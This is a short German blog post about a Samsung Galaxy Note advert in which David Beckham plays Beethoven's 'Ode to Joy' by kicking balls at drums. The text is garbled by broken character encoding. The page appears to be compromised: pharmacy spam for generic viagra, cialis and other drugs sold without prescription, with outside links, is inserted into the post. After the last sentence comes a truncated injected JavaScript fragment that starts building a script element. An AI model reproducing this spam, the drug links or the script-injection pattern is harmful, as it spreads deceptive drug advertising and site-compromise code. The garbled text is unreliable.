Willkommen auf » David Beckham meets Ludwig van Beethoven
23. Mai 2012

David Beckham meets Ludwig van Beethoven

Freude schAi??ner GAi??tterfunken – Samsung besinnt sich auf die Klassik und lAi??sst David Beckham fA?r die Promotion des neuen Galaxy Note mit einer Hand voll BAi??llen auf eine Torwand aus Trommeln schieAYen. Erst wird geplant, dann geschaut und schlieAYlich mit gewohnter PrAi??zision getreten. Heraus kommt, man glaubt es kaum, Ludwig van Beethovens wunderschAi??ne Ode „An die Freude“.

Coole Aktion… :)
cheap mircette generic equivalent best no prescription pharmacy. http://www.braianjoes.services/2018/03/18/lipitor-atorvastatin-calcium-price/ tadalifil without a script Buy
(Werbeblocker ausschalten)

Und, habt ihr die Namensdopplung erkannt?
Beckham vom US-Klub Los Angeles Galaxy wirbt fA?r das Samsung Galaxy Note. Da wird die Marketingabteilung lange fA?r geschwitzt haben ;)var d=document;var s=d.createElement(‚script‘); dilantin brand vs generic where to purchase terramycin what is the generic name for hytrin buy generic viagra paypal, donepezil no prescription canadian. http://roelienkegort.nl/aricept-generic-dosage/ how to buy antidepressants online online generic cialis. Cheap can you buy doxycycline online online overnight pharmacy4u order.


Einen Kommentar schreiben